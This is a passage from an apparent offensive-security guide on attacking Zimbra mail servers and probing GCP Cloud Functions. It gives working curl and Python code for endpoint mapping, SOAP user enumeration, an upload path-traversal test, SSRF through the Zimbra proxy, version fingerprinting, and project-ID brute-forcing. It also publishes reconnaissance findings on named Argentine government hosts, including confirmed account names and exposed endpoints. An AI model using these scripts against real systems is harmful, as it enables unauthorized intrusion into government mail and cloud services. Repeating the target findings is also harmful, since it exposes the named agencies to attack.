&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: &lt;code&gt;datos.gob.ar&lt;/code&gt; — CKAN with:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;45 Argentine government organizations&lt;/li&gt;
&lt;li&gt;1000+ public datasets&lt;/li&gt;
&lt;li&gt;Completely open API without authentication&lt;/li&gt;
&lt;li&gt;Spring Boot Actuator returning 500 (potential info disclosure)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="810-zimbra--attack-surface" &gt;
&lt;div&gt;
&lt;a href="#810-zimbra--attack-surface"&gt;
##
&lt;/a&gt;
8.10 Zimbra — Attack Surface
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Zimbra is a common email/collaboration server in government. Multiple critical CVEs. The surface is rich:&lt;/p&gt;
&lt;h4 id="essential-endpoints" &gt;
&lt;div&gt;
&lt;a href="#essential-endpoints"&gt;
###
&lt;/a&gt;
Essential Endpoints
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Identify Zimbra&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -skI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;zimbra&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# /zimbra/ path, /zimbraAdmin/, cookies ZM_TEST, JSESSIONID&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Map endpoints&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; path in / /robots.txt /service/soap /service/admin/soap &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; /service/upload /service/proxy /zimbraAdmin/ &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; /zimbra/ /public/ /m/ /js/Startup1_2_all.js; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;code&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;curl -sk -o /dev/null -w &lt;span style="color:#a6d189"&gt;&amp;#34;%{http_code}&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$path&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$path&lt;/span&gt;&lt;span style="color:#a6d189"&gt; → &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$code&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# /service/upload = UploadServlet (POST 200 = active!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# /service/proxy = proxy SSRF (401 = exists, requires auth)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# /public/ = public directory (403 = exists, blocked)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# /m/ = mobile client (302 = active, redirects)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="soap-user-enumeration" &gt;
&lt;div&gt;
&lt;a href="#soap-user-enumeration"&gt;
###
&lt;/a&gt;
SOAP User Enumeration
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;Zimbra differentiates existing from non-existing users through SOAP error messages:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;re&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;soap_template &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;#39;&amp;#39;&amp;lt;soap:Envelope xmlns:soap=&amp;#34;http://www.w3.org/2003/05/soap-envelope&amp;#34;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;soap:Body&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;AuthRequest xmlns=&amp;#34;urn:zimbraAccount&amp;#34;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;account by=&amp;#34;name&amp;#34;&amp;gt;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{user}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;lt;/account&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;password&amp;gt;wrongpass&amp;lt;/password&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;/AuthRequest&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;/soap:Body&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;&amp;lt;/soap:Envelope&amp;gt;&amp;#39;&amp;#39;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; user &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; [&lt;span style="color:#a6d189"&gt;&amp;#39;admin&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;root&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;compras&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;backup&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;info&amp;#39;&lt;/span&gt;]:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; body &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; soap_template&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;format(user&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;user)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;post(&lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/service/soap&amp;#34;&lt;/span&gt;, data&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;body,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#39;Content-Type&amp;#39;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;application/soap+xml&amp;#39;&lt;/span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fault &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; re&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;findall(&lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&amp;lt;soap:Text&amp;gt;(.*?)&amp;lt;/soap:Text&amp;gt;&amp;#39;&lt;/span&gt;, r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; fault:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; msg &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; fault[&lt;span style="color:#ef9f76"&gt;0&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;authentication failed&amp;#39;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; msg:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;user&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;: EXISTS (wrong password)&amp;#34;&lt;/span&gt;) &lt;span style="color:#737994;font-style:italic"&gt;# ← USER EXISTS&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;elif&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;maintenance mode&amp;#39;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; msg:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;user&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;: EXISTS (maintenance mode!)&amp;#34;&lt;/span&gt;) &lt;span style="color:#737994;font-style:italic"&gt;# ← EXISTS + maintenance mode&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;elif&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;no such account&amp;#39;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; msg:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;user&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;: DOES NOT EXIST&amp;#34;&lt;/span&gt;) &lt;span style="color:#737994;font-style:italic"&gt;# ← DOES NOT EXIST (rare, only on old versions)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Message patterns&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;authentication failed for [user]&lt;/code&gt; → user EXISTS (or generic response — confirm with other methods)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;account is in maintenance mode&lt;/code&gt; → user EXISTS and is in maintenance mode (CONFIRMED!)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;no such account&lt;/code&gt; → user DOES NOT exist (old versions)&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="uploadservlet--path-traversal-cve-2022-37042" &gt;
&lt;div&gt;
&lt;a href="#uploadservlet--path-traversal-cve-2022-37042"&gt;
###
&lt;/a&gt;
UploadServlet — Path Traversal (CVE-2022-37042)
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;The &lt;code&gt;/service/upload&lt;/code&gt; endpoint accepts file uploads. In vulnerable versions, the filename parameter accepts path traversal:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test UploadServlet&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/service/upload&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -F &lt;span style="color:#a6d189"&gt;&amp;#34;file=@test.txt;filename=../../../opt/zimbra/data/tmp/evil.txt&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Normal response (401): requires authentication&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Response 200 with attachmentId = functional, try path traversal&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="serviceproxy--internal-ssrf" &gt;
&lt;div&gt;
&lt;a href="#serviceproxy--internal-ssrf"&gt;
###
&lt;/a&gt;
/service/proxy — Internal SSRF
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;If authenticated, the Zimbra proxy can be used for SSRF on the internal network:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Requires authentication cookie&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/service/proxy?target=http://127.0.0.1:7071/zimbraAdmin/&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Cookie: ZM_AUTH_TOKEN=...&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="soap-trace-ids--environment-info" &gt;
&lt;div&gt;
&lt;a href="#soap-trace-ids--environment-info"&gt;
###
&lt;/a&gt;
SOAP Trace IDs — Environment Info
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;SOAP errors include Trace IDs that reveal server information:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-xml" data-lang="xml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;&amp;lt;Trace&amp;gt;&lt;/span&gt;qtp66233253-9975:1782161969125:0daaf6c77a00b8c8&lt;span style="color:#ca9ee6"&gt;&amp;lt;/Trace&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# qtp = Jetty thread pool (embedded server)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# internal timestamp in Unix epoch format
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="version-fingerprinting" &gt;
&lt;div&gt;
&lt;a href="#version-fingerprinting"&gt;
###
&lt;/a&gt;
Version Fingerprinting
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Startup JS bundles (1854KB+ with internal versions)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/js/Startup1_2_all.js&amp;#34;&lt;/span&gt; | grep -oP &lt;span style="color:#a6d189"&gt;&amp;#39;ZmSetting.*?&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Response headers&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -skI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/&amp;#34;&lt;/span&gt; | grep -iE &lt;span style="color:#a6d189"&gt;&amp;#34;(x-zimbra|server|set-cookie|zimbra)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Admin error on port 443&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/zimbraAdmin/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;Request not allowed on port 443&amp;#34; → Admin EXISTS on internal port&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="cves-by-version" &gt;
&lt;div&gt;
&lt;a href="#cves-by-version"&gt;
###
&lt;/a&gt;
CVEs by Version
&lt;/div&gt;
&lt;/h4&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Version&lt;/th&gt;
&lt;th&gt;Build&lt;/th&gt;
&lt;th&gt;CVEs&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;8.8.11&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;GA 2019&lt;/td&gt;
&lt;td&gt;CVE-2022-27925 (RCE memcache), CVE-2022-37042 (auth bypass), CVE-2023-37580 (XSS)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;8.8.15&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;GA 2020&lt;/td&gt;
&lt;td&gt;CVE-2022-27925, CVE-2022-37042, CVE-2022-24682 (ATO)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;9.0.0&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;2021+&lt;/td&gt;
&lt;td&gt;CVE-2022-37042, CVE-2023-37580&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;10.0.x&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;2023+&lt;/td&gt;
&lt;td&gt;CVE-2023-37580, CVE-2024-45579 (auth bypass)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: &lt;code&gt;mail.ign.gob.ar&lt;/code&gt; — Zimbra 8.8.11_GA_3787:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;/service/upload&lt;/code&gt; returns 200 (UploadServlet active, requires auth)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/service/soap&lt;/code&gt; functional — user &lt;code&gt;admin&lt;/code&gt; confirmed, &lt;code&gt;compras&lt;/code&gt; in maintenance mode&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/service/proxy&lt;/code&gt; returns 401 (exists, requires authentication)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/zimbraAdmin/&lt;/code&gt; returns &amp;ldquo;Request not allowed on port 443&amp;rdquo; (Admin exists behind firewall)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/m/&lt;/code&gt; mobile client active (302 → jsessionid)&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2 id="9-cloud-functions--serverless-gcp-aws" &gt;
&lt;div&gt;
&lt;a href="#9-cloud-functions--serverless-gcp-aws"&gt;
#
&lt;/a&gt;
9. CLOUD FUNCTIONS &amp;amp; SERVERLESS (GCP, AWS)
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="91-url-patterns-gcp" &gt;
&lt;div&gt;
&lt;a href="#91-url-patterns-gcp"&gt;
##
&lt;/a&gt;
9.1 URL Patterns (GCP)
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;https://{REGION}-{PROJECT_ID}.cloudfunctions.net/{FUNCTION_NAME}
https://us-central1-{PROJECT_ID}.cloudfunctions.net/api/feed
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id="92-finding-the-project_id" &gt;
&lt;div&gt;
&lt;a href="#92-finding-the-project_id"&gt;
##
&lt;/a&gt;
9.2 Finding the PROJECT_ID
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Common company name variations&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;projects &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a6d189"&gt;&amp;#34;empresa&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;empresa-app&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;empresa-prod&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;empresa-dev&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;empresa-1&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;empresa-12345&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;app-empresa&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;admin-1a2b3&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;regions &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a6d189"&gt;&amp;#34;us-central1&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;us-east1&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;southamerica-east1&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;europe-west1&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; proj &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; projects:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; region &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; regions:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; url &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;https://&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;region&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;-&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;proj&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.cloudfunctions.net/api/feed?limit=1&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;try&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(url, timeout&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;5&lt;/span&gt;)
